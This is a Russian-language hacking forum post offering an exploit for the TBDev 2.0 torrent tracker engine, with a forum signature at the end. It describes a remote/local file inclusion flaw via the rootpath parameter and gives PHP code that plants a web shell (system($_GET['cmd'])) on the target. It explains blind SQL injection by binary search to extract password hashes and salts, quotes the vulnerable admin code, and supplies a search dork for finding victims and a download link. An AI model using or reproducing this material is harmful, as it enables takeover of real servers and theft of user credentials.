Сплоит для TBDev 2.0. , от паблик версии отличается тем, что пытается залить шелл на сервер, помимо поиска пасса/соли. Если шелл залить не удаётся, значит вместо RFI прийдётся использовать LFI, или на сервере не работает функция
file_put_contents, которую вполне можно заменить на обычный fopen/fwrite.
LFI/RFI в админке используя параметр
admincp.php?rootpath=.
Если register_globals ON, то LFI/RFI доступны и не из админки, а из index.php, тот же параметр.
Читайте комментарии к сплоиту, для заливки шелла, нужно положить код
Код:
<?php
file_put_contents("torrents/.htaccess", "");
file_put_contents("torrents/shell.php", "<? system(\$_GET['cmd']) ?>");
?>
В файл доступный для чтения, на вашем сервере и прописать путь к нему в переменной $uploader.
Так же сплоит может просто вытащить хеш, соль не закачивая шелл. Используется алгоритм бинарного поиска, так что запросов шлётся относительно немного, для слепой скули. (максимум 4 запроса на символ, вместо стабильно 16 при полном переборе, т.е. работает минимум в 4 раза быстрее, чем при полном переборе. И вообще для всех сплоитов со слепыми скулями, использующих BENCHMARK или перебор имён таблиц, стоит использовать алгоритм бинарного поиска, так быстрее)
P.S.
В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания:
Код:
$op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];
foreach ($_GET as $key => $value)
$GLOBALS[$key] = $value;
foreach ($_POST as $key => $value)
$GLOBALS[$key] = $value;
foreach ($_COOKIE as $key => $value)
$GLOBALS[$key] = $value;
Этот файл инклудится в admin.php .
Dork:"Powered by TBDev v2.0"
Качать тут:
http://www.x2b.ru/get/14887
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог:
http://qwazar.ru/.